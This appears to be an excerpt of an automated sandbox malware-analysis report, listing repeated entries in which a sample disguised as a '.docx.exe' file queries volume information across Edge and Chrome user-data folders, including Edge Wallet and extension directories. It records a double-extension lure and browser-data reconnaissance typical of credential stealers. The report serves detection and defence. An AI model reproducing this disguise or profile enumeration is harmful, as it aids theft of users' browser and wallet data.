Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231004.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231006.1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List\2.0.0.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
